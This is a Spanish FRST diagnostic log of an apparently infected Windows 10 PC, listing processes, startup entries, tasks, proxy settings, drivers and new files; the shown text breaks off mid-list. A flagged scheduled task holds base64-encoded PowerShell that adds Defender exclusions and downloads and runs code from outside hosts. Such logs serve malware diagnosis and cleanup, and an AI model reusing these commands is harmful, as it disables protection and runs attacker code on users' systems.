Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x64) Versión: 31-07-2025 Ejecutado por Asus (administrador) sobre EQUIPO2 (08-08-2025 05:49:15) Ejecutado desde C:\descarga\FRST64 (2).exe Perfiles cargados: Asus Plataforma: Microsoft Windows 10 Pro Versión 22H2 19045.6159 (X64) Idioma: Español (México) Navegador predeterminado: Edge Modo de Inicio: Normal ==================== Procesos (Lista blanca) ================= (Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.) (AsusDownloadAgent.exe ->) (ASUSTeK Computer Inc. -> ) C:\Program Files (x86)\ASUS\ASUSQInstaller\ASUSQInstaller.exe (AsusUpdateCheck.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\System32\AsusDownloadAgent.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <45> (services.exe ->) (ASUSTeK Computer Inc. -> ) C:\Windows\System32\AsusUpdateCheck.exe (services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_af50fdb80983f7bc\jhi_service.exe (services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_d51901c26227fb29\WMIRegistrationService.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MpDefenderCoreService.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MsMpEng.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\NisSrv.exe (services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_0afec3f2050014a0\Display.NvContainer\NVDisplay.Container.exe <2> (svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <4> (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (WindowsPowerShell\v1.0\powershell.exe ->) (OpenJS Foundation -> Node.js) C:\Windows\System32\DomainAuthHost\node.exe ==================== Registro (Lista blanca) =================== (Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.) HKU\S-1-5-21-445679625-7064280-625658069-1001\...\Run: [MicrosoftEdgeAutoLaunch_E27E50BD5633453D54C19716A813DFE6] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start [4117568 2025-08-07] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-445679625-7064280-625658069-1001\...\RunOnce: [Delete Cached Update Binary] => C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\Asus\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" [42164600 2025-08-08] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-445679625-7064280-625658069-1001\...\RunOnce: [Delete Cached Standalone Update Binary] => C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\Asus\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" (Ningún archivo) HKU\S-1-5-21-445679625-7064280-625658069-1001\...\RunOnce: [Uninstall 19.043.0304.0013\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Asus\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\amd64" [0 2025-08-08] () <==== ATENCIÓN [cero bytes Archivo/Carpeta] HKU\S-1-5-21-445679625-7064280-625658069-1001\...\RunOnce: [Uninstall 19.043.0304.0013] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Asus\AppData\Local\Microsoft\OneDrive\19.043.0304.0013" [0 2025-08-08] () <==== ATENCIÓN [cero bytes Archivo/Carpeta] HKU\S-1-5-18\...\Run: [RazerAppEngine] => C:\Program Files\Razer\RazerAppEngine\RazerAppEngine.exe [760072 2025-04-25] (Razer USA Ltd. -> Razer Inc.) ==================== Tareas programadas (Lista blanca) ================= (Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.) Task: {D50AA628-5CCE-4113-8C9A-2BFFBDCFC27E} - System32\Tasks\Intel PTT EK Recertification => C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_fc84dfa25a6a7727\lib\IntelPTTEKRecertification.exe [855664 2023-12-14] (Intel Corporation -> Intel(R) Corporation) Task: {F035688A-AA49-4DE6-BDE4-4A68B196AA1F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MpCmdRun.exe [1778240 2025-08-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {5FCC63B7-7BA7-4993-B7AE-0FDAF1E5985C} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MpCmdRun.exe [1778240 2025-08-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {6F2B4D6D-DC2F-42AE-AF77-666F1EA84E5E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MpCmdRun.exe [1778240 2025-08-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {7382AD8D-4802-4D4B-BA32-0B68C50093E3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MpCmdRun.exe [1778240 2025-08-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {0C425E86-F47C-4F51-9A6E-95485640824E} - System32\Tasks\MicrosoftResourcesAgentV2Task => Command(1): schtasks -> /run /tn MicrosoftResourcesAgentV2Task <==== ATENCIÓN Task: {0C425E86-F47C-4F51-9A6E-95485640824E} - System32\Tasks\MicrosoftResourcesAgentV2Task => Command(2): powershell -> -NoProfile -EncodedCommand IwAgADUAZQAzADIAZQBiAGIANAAtADgAMQBiAGUALQA0ADUAYgA4AC0AYQBiADAAMgAtADkAOQA2AGQAYgBkADUAOQA0ADQAOQA1AAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBQAEkARAAgACQAUABJAEQAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBNAG8AZAB1AGwAZQBOAGEAbQBlACAALQBGAG8AcgBjAGUA <==== ATENCIÓN Task: {0C425E86-F47C-4F51-9A6E-95485640824E} - System32\Tasks\MicrosoftResourcesAgentV2Task => Command(3): powershell -> -NoProfile -EncodedCommand IwAgADUAZgAwAGMAOAAyAGMAMwAtAGQAZQBkADIALQA0ADAAMgBmAC0AOABkADUANgAtADAANgAwADQAOABlADEAYgAxADgAMQBlAAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgARwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AKQAgAC0ARgBvAHIAYwBlAA== <==== ATENCIÓN Task: {0C425E86-F47C-4F51-9A6E-95485640824E} - System32\Tasks\MicrosoftResourcesAgentV2Task => Command(4): powershell -> -NoProfile -EncodedCommand IwAgADIAZABiADEAMwA2AGUAMAAtADAAMQA5ADIALQA0ADUAMwBjAC0AOAA0ADEAMgAtADYAMgAwAGEANQAyAGIAYwAzAGEAMQBiAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAGkANQByADQAagAuADEAOAAtADIAMgAtADUAOQAuAGMAbwBtAD8ATQBpAGMAcgBvAHMAbwBmAHQAUgBlAHMAbwB1AHIAYwBlAHMAQQBnAGUAbgB0AFYAMgBUAGEAcwBrACAAfAAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgA= <==== ATENCIÓN Task: {0C425E86-F47C-4F51-9A6E-95485640824E} - System32\Tasks\MicrosoftResourcesAgentV2Task => Command(5): powershell -> -NoProfile -EncodedCommand IwAgAGYAMwBlADUAOABhADIAZgAtADIAYQA1ADUALQA0ADMANAA1AC0AYQA5AGYANQAtAGEAMwA0AGEAMgAwAGEAZQA1AGIAZgAyAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAGYALgBmAGkAcgBlAHcAYQBsAGwALQA4ADEAMwAuAGMAbwBtAD8ATQBpAGMAcgBvAHMAbwBmAHQAUgBlAHMAbwB1AHIAYwBlAHMAQQBnAGUAbgB0AFYAMgBUAGEAcwBrACAAfAAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgA= <==== ATENCIÓN (Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.) ==================== Internet (Lista blanca) ==================== (Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.) ProxyEnable: [S-1-5-21-445679625-7064280-625658069-1001] => Proxy está habilitado. ProxyServer: [S-1-5-21-445679625-7064280-625658069-1001] => 127.0.0.1:58060 Tcpip\Parameters: [DhcpNameServer] 192.168.18.1 Tcpip\..\Interfaces\{7016ef58-30a8-4f54-b144-e6e6cc43f1b5}: [DhcpNameServer] 192.168.18.1 ManualProxies: 1127.0.0.1:58060 <==== ATENCIÓN Edge: ======= Edge Profile: C:\Users\Asus\AppData\Local\Microsoft\Edge\User Data\Default [2025-08-08] Edge DownloadDir: Default -> C:\descarga Edge Extension: (Documentos de Google sin conexión) - C:\Users\Asus\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2025-08-08] Edge Extension: (Edge relevant text changes) - C:\Users\Asus\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2025-08-08] ==================== Servicios (Lista blanca) =================== (Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.) R2 AsusUpdateCheck; C:\WINDOWS\System32\AsusUpdateCheck.exe [1097624 2025-08-08] (ASUSTeK Computer Inc. -> ) R2 MDCoreSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.25070.5-0\MpDefenderCoreService.exe [2050952 2025-08-08] (Microsoft Windows Publisher -> Microsoft Corporation) R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_0afec3f2050014a0\Display.NvContainer\NVDisplay.Container.exe [1275000 2024-09-16] (NVIDIA Corporation -> NVIDIA Corporation) S3 Razer Elevation Service; C:\Program Files\Razer\razer_elevation_service\razer_elevation_service.exe [1741960 2025-04-25] (Razer USA Ltd. -> Razer Inc) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [918432 2025-08-08] (Microsoft Windows Publisher -> Microsoft Corporation) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.25070.5-0\NisSrv.exe [4517784 2025-08-08] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.25070.5-0\MsMpEng.exe [282464 2025-08-08] (Microsoft Windows Publisher -> Microsoft Corporation) ===================== Controladores (Lista blanca) =================== (Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.) R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2018-07-20] (ASUSTeK Computer Inc. -> ) S3 dg_ssudbus; C:\WINDOWS\System32\drivers\ssudbus2.sys [167440 2022-09-30] (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) R3 KslD; C:\WINDOWS\System32\drivers\wd\KslD.sys [332184 2025-08-08] (Microsoft Windows -> Microsoft Corporation) R3 RzCommon; C:\WINDOWS\System32\drivers\RzCommon.sys [64168 2022-08-18] (Razer USA Ltd. -> Razer Inc) R3 RzDev_0098; C:\WINDOWS\System32\drivers\RzDev_0098.sys [55624 2021-01-28] (Razer USA Ltd. -> Razer Inc) S3 ssudqcfilter; C:\WINDOWS\System32\drivers\ssudqcfilter.sys [76832 2022-09-30] (Samsung Electronics CO., LTD. -> QUALCOMM Incorporated) S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [20888 2025-08-08] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [627120 2025-08-08] (Microsoft Windows -> Microsoft Corporation) R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [101792 2025-08-08] (Microsoft Windows -> Microsoft Corporation) S3 Wibukey2_64; C:\WINDOWS\system32\drivers\wibukey2_64.sys [42936 2016-12-20] (WIBU-SYSTEMS AG -> WIBU-SYSTEMS AG) ==================== NetSvcs (Lista blanca) =================== (Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.) ==================== Un mes (creado) (Lista blanca) ========= (Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.) 2025-08-08 05:47 - 2025-08-08 05:49 - 000000000 ____D C:\FRST 2025-08-08 05:42 - 2025-08-08 05:49 - 000000000 ____D C:\descarga 2025-08-08 05:38 - 2025-08-08 05:38 - 002409472 _____ (Farbar) C:\Users\Asus\Downloads\Sin confirmar 327248.crdownload 2025-08-08 05:36 - 2025-08-08 05:38 - 002409472 _____ (Farbar) C:\Users\Asus\Downloads\FRST64 (3).exe 2025-08-08 05:34 - 2025-08-08 05:34 - 002409472 _____ (Farbar) C:\Users\Asus\Downloads\Sin confirmar 628666.crdownload 2025-08-08 05:34 - 2025-08-08 05:34 - 002409472 _____ (Farbar) C:\Users\Asus\Downloads\Sin confirmar 44344.crdownload 2025-08-08 05:29 - 2025-08-08 05:39 - 000000000 ____D C:\Users\Asus\AppData\Roaming\Microsoft\Spelling 2025-08-08 05:27 - 2025-08-08 05:27 - 001189784 _____ (ASUSTeK Computer Inc.) C:\WINDOWS\system32\AsusDownloadAgent.exe 2025-08-08 05:27 - 2025-08-08 05:27 - 000378376 _____ C:\WINDOWS\system32\syncas.dll 2025-08-08 05:27 - 2025-08-08 05:27 - 000008090 _____ C:\WINDOWS\Ascd_tmp.ini 2025-08-08 05:27 - 2025-08-08 05:27 - 000000916 _____ C:\WINDOWS\Ascd_ProcessLog.ini 2025-08-08 05:27 - 2025-08-08 05:27 - 000000000 ____D C:\Program Files (x86)\ASUS 2025-08-08 05:27 - 2025-08-08 05:27 - 000000000 _____ C:\WINDOWS\SysWOW64\Drivers\1043_ASUSTeK_.alu 2025-08-08 05:27 - 2018-07-20 15:44 - 000028672 _____ (ASUSTek Computer Inc.) C:\WINDOWS\SysWOW64\AsIO.dll 2025-08-08 05:27 - 2018-07-20 15:44 - 000015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys 2025-08-08 02:05 - 2025-08-08 02:05 - 000003572 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-445679625-7064280-625658069-1001 2025-08-08 02:04 - 2025-08-08 02:05 - 000003352 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-445679625-7064280-625658069-1001 2025-08-08 02:04 - 2025-08-08 02:04 - 000000000 ____D C:\Users\Asus\AppData\Local\D3DSCache 2025-08-08 02:04 - 2025-08-08 02:04 - 000000000 ____D C:\ProgramData\Microsoft OneDrive 2025-08-08 02:03 - 2025-08-08 05:45 - 000000000 ____D C:\WINDOWS\system32\DomainAuthHost 2025-08-08 02:02 - 2025-08-08 05:27 - 000333224 _____ () C:\WINDOWS\system32\AsusDownLoadLicense.exe 2025-08-08 02:02 - 2025-08-08 02:19 - 000000000 ____D C:\Users\Asus\AppData\Local\Publishers 2025-08-08 02:02 - 2025-08-08 02:19 - 000000000 ____D C:\Users\Asus\AppData\Local\Packages 2025-08-08 02:02 - 2025-08-08 02:19 - 000000000 ____D C:\ProgramData\Packages 2025-08-08 02:02 - 2025-08-08 02:02 - 000003840 _____ C:\WINDOWS\system32\Tasks\Intel PTT EK Recertification 2025-08-08 02:02 - 2025-08-08 02:02 - 000000020 ___SH C:\Users\Asus\ntuser.ini 2025-08-08 02:02 - 2025-08-08 02:02 - 000000000 ____D C:\Users\Asus\AppData\Roaming\Microsoft\Network 2025-08-08 02:02 - 2025-08-08 02:02 - 000000000 ____D C:\Users\Asus\AppData\Roaming\Adobe 2025-08-08 02:02 - 2025-08-08 02:02 - 000000000 ____D C:\Users\Asus\AppData\Local\VirtualStore 2025-08-08 02:02 - 2025-08-08 02:02 - 000000000 ____D C:\Users\Asus\AppData\Local\ConnectedDevicesPlatform 2025-08-08 02:02 - 2025-08-08 02:02 - 000000000 ____D C:\Program Files\NVIDIA Corporation 2025-08-08 01:26 - 2025-08-08 00:45 - 000006546 _____ C:\WINDOWS\system32\Tasks\MicrosoftResourcesAgentV2Task 2025-08-08 01:25 - 2025-08-08 02:01 - 000000000 ____D C:\WINDOWS\Panther 2025-08-08 01:19 - 2025-08-08 02:01 - 000000000 ____D C:\Windows.old 2025-08-08 01:19 - 2025-08-08 01:19 - 000000000 ____D C:\WINDOWS\ServiceProfiles 2025-08-08 01:18 - 2025-08-08 02:02 - 000000000 ____D C:\Program Files (x86)\Razer 2025-08-08 01:17 - 2025-08-08 01:17 - 000008192 _____ C:\WINDOWS\system32\config\userdiff 2025-08-08 01:17 - 2025-08-08 01:17 - 000000000 ____D C:\WINDOWS\Setup 2025-08-08 01:16 - 2025-08-08 05:30 - 000783166 _____ C:\WINDOWS\system32\perfh00A.dat 2025-08-08 01:16 - 2025-08-08 05:30 - 000152734 _____ C:\WINDOWS\system32\perfc00A.dat 2025-08-08 01:16 - 2025-08-08 02:02 - 000000000 ____D C:\WINDOWS\system32\FxsTmp 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\XPSViewer 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\winrm 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\WCN 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\sysprep 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\slmgr 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\Printing_Admin_Scripts 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\MailContactsCalendarSync 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\FxsTmp 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\es 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\0409 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\winrm 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\WCN 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\slmgr 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\Printing_Admin_Scripts 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\OpenSSH 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\MailContactsCalendarSync 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\es 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\0409 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\OCR 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\DigitalLocker 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\addins 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\ProgramData\ssh 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\Program Files\Reference Assemblies 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\Program Files\MSBuild 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies 2025-08-08 01:16 - 2025-08-08 01:16 - 000000000 ____D C:\Program Files (x86)\MSBuild 2025-08-08 01:14 - 2025-08-08 05:29 - 000000000 ____D C:\WINDOWS\appcompat 2025-08-08 01:14 - 2025-08-08 05:27 - 000000000 ___RD C:\Program Files (x86) 2025-08-08 01:14 - 2025-08-08 05:26 - 000000000 ____D C:\Program Files\Windows Defender 2025-08-08 01:14 - 2025-08-08 02:26 - 000000000 ____D C:\WINDOWS\AppReadiness 2025-08-08 01:14 - 2025-08-08 02:18 - 000000000 ___RD C:\WINDOWS\PrintDialog 2025-08-08 01:14 - 2025-08-08 02:17 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2025-08-08 01:14 - 2025-08-08 02:04 - 000000000 ____D C:\ProgramData\USOPrivate 2025-08-08 01:14 - 2025-08-08 02:03 - 000000000 ___HD C:\Program Files\WindowsApps 2025-08-08 01:14 - 2025-08-08 02:02 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2025-08-08 01:14 - 2025-08-08 02:02 - 000000000 ____D C:\WINDOWS\system32\spool 2025-08-08 01:14 - 2025-08-08 02:01 - 000000000 ____D C:\WINDOWS\system32\oobe 2025-08-08 01:14 - 2025-08-08 01:25 - 000000000 ____D C:\WINDOWS\Containers 2025-08-08 01:14 - 2025-08-08 01:24 - 000028672 _____ C:\WINDOWS\system32\config\BCD-Template 2025-08-08 01:14 - 2025-08-08 01:23 - 000000000 ____D C:\WINDOWS\system32\WinBioDatabase 2025-08-08 01:14 - 2025-08-08 01:23 - 000000000 ____D C:\WINDOWS\CSC 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ___SD C:\WINDOWS\system32\F12 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ___SD C:\WINDOWS\system32\dsc 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\setup 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\MUI 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SysWOW64\Com 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\SystemResources 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\Sysprep 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\setup 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\MUI 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\migwiz 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\Dism 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\system32\Com 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\PolicyDefinitions 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\IME 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\WINDOWS\Help 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\Program Files\Windows Photo Viewer 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\Program Files\Common Files\System 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\Program Files\Common Files\microsoft shared 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\Program Files (x86)\Windows NT 2025-08-08 01:14 - 2025-08-08 01:16 - 000000000 ____D C:\Program Files (x86)\Windows Defender 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 __SHD C:\WINDOWS\BitLockerDiscoveryVolumeContents 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 __SHD C:\Program Files\Windows Sidebar 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 __SHD C:\Program Files (x86)\Windows Sidebar 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 __RSD C:\WINDOWS\Media 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\Nui 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\Configuration 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ___SD C:\WINDOWS\system32\UNP 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ___SD C:\WINDOWS\system32\Nui 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ___SD C:\WINDOWS\system32\Configuration 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ___SD C:\WINDOWS\system32\AppV 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ___SD C:\WINDOWS\Downloaded Program Files 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ___RD C:\WINDOWS\Offline Web Pages 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ___HD C:\WINDOWS\LanguageOverlayCache 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\Web 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\WaaS 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\Vss 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\tracing 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\TAPI 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\SMI 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\ras 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\NDF 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Msdtc 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\migwiz 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Keywords 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Ipmi 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\InputMethod 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\inetsrv 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\IME 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D 